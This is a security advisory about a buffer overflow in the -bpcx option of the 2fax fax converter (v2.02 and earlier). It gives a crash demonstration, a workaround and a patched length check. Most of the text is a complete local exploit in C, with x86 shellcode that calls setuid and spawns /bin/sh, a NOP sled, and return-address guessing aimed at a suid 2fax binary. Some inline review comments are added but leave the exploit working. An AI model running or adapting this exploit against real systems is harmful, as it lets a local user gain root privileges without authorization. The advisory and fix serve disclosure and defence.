2fax is a command line program which converts ASCII files into fax (tiff) formatted files. It works with Hylafax (Linux) and bgfax (DOS/Windows). It also uses PCX files for logos and signatures, which can be overlaid over the ASCII text. The program has been found to contain a security vulnerability that would allow a local attacker to gain elevated privileges.
Credit:
The information has been provided by Crazy Einstein.
Vulnerable systems:
* 2fax version 2.02 and prior
Example:
When 2fax is run with the -bpcx option and the option value is long (more than about 212 characters), the program crashes with a segmentation fault:
[root@ns 2fax-2.02]# ./2fax -bpcx:`perl -e 'print "A"x666'` aaa aaa
Segmentation fault (core dumped)
[root@ns 2fax-2.02]# gdb 2fax core
...
#0 0x41414141 in ?? ()
(gdb)
...
Therefore, arbitrary code can be executed with the uid/gid of the program's owner if the binary has been installed with the suid bit set.
Temporary solution:
1) Clear the suid bit on the program:
# chmod ug-s /path/to/2fax
2) Edit the source of the 2fax program so that the length of the option value is checked before it is copied:
...
char page_pcxfn[81]=""; /* page pcx file */
...
word setswitches(char *sw, word cmdline, word def)
{
...
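case 17 :
    /* -bpcx:<file>: copy the PCX file name that follows the option into
     * page_pcxfn. page_pcxfn is a fixed 81-byte array, so the value must be
     * checked by *length* before it is copied: comparing &sw[l] (a pointer)
     * with 81 does not test the length at all and leaves the overflow in
     * place. Values that do not fit together with the terminating NUL are
     * rejected with a message rather than truncated. */
    if (strlen(&sw[l]) < sizeof page_pcxfn) {
        strcpy(page_pcxfn, &sw[l]);
        if (cmdline == 0) page_pcxno = Openpcx(1, page_pcxfn); /*1.91*/
    } else {
        /* sizeof - 1: one byte of the array is reserved for the NUL */
        printf("Error: Length of pcx file is too big (max %u)\n",
               (unsigned)(sizeof page_pcxfn - 1));
    }
    break;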
...
Exploit code:
/*******************************************************************************
* *
* 2fax local PoC exploit *
* by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru] *
* *
* Bug: Buffer Overflow in -bpcx option *
* Homepage of 2fax: http://www.atbas.org/ *
* *
* Solution: Don't set suid bit to 2fax program *
* *
*******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#define MAX_SIZE 350 /* size of the payload buffer built in main() */
#define OFFSET -1100 /* default value subtracted from getesp(); argv[2] overrides it */
/* NOTE(review): `tmpfile` is the name of a <stdio.h> function; defining a
 * macro with that name after including the header uses an identifier the
 * standard reserves (C11 7.1.3). A name such as TMPFILE_PATH would avoid
 * the clash. */
#define tmpfile "/tmp/abcde0987654" /* fixed path handed to 2fax as both file arguments */
/* shellcode for Linux x86 by Grange */
/* Raw machine-code bytes followed by the string "/bin/sh"; not decoded here. */
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
/* Return the current stack pointer of the calling process.
 * The inline asm copies %esp into %eax and the function ends without a C
 * `return`; this relies on the i386 convention that an integer result is
 * left in %eax. Falling off the end of a non-void function whose value is
 * used is undefined behavior in standard C, and the asm is 32-bit x86
 * only, so the value may not survive other compilers or optimization
 * levels. */
long getesp() {
__asm__("movl %esp,%eax");
}
/* Print the command-line synopsis to stdout.
 * argc is accepted but unused; argv[0] is printed as the program name.
 * Returns nothing; the caller decides whether to exit. */
void usage(int argc, char **argv) {
printf("Local exploit for 2fax program (<= v2.02)\n by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru]\n\n"
"Usage: %s </path/to/2fax> [offset]\n\n",argv[0]);
return;
}
/* Entry point of the PoC: builds the over-long "-bpcx:" option value the
 * advisory describes and replaces this process with the 2fax binary named
 * by argv[1]. argv[2], when present, replaces OFFSET.
 *
 * Notes from review (code left as written):
 *  - strcpy/strcat/strstr/strlen/memset need <string.h>, bzero needs
 *    <strings.h> and execl needs <unistd.h>; none of these headers is
 *    included, so the calls are implicitly declared.
 *  - strcpy(faxpath, argv[1]) copies into a 100-byte array with no length
 *    check, so the PoC itself can overflow on a long path argument.
 *  - "%x" is used to print `ret`, which is a long; "%lx" matches the type.
 */
int main(int argc,char **argv) {
char buf[MAX_SIZE], buf2[MAX_SIZE + 20], faxpath[100], *p, tmpexec[200];
int offset = OFFSET;
long ret;
if(argc<2) { usage(argc,argv); exit(-1); }
strcpy(faxpath,argv[1]); /* unchecked copy into faxpath[100] */
if(argv[2]) offset=atoi(argv[2]); /* argv[argc] is NULL, so this read is fine when argc == 2 */
bzero(buf,sizeof(buf));
bzero(buf2,sizeof(buf2));
ret=getesp()-offset; /* address guess derived from this process's own stack pointer */
printf("ret: 0x%x, offset: %d\n",ret,offset); /* format/argument type mismatch, see header note */
memset(buf,0x90,312-strlen(shellcode)); /* 0x90 filler, then the payload bytes, then a marker */
strcat(buf,shellcode);
strcat(buf,"AAAAAAAAAAAAAAAA");
while( (p=(char *)strstr(buf,"AAAA")) != NULL ) *(long*)p=ret; /* overwrite every "AAAA" with ret; unaligned, type-punned store */
sprintf(buf2,"-bpcx:%s",buf); /* this is the option value that overflows page_pcxfn[81] in 2fax */
sprintf(tmpexec,"touch %s;rm -rf %s",tmpfile,tmpfile); /* shells out to create and then delete the dummy path */
system(tmpexec);
execl(faxpath,faxpath,buf2,tmpfile,tmpfile,NULL); /* replaces this process; returns only on failure, which is not checked */
return 0;
}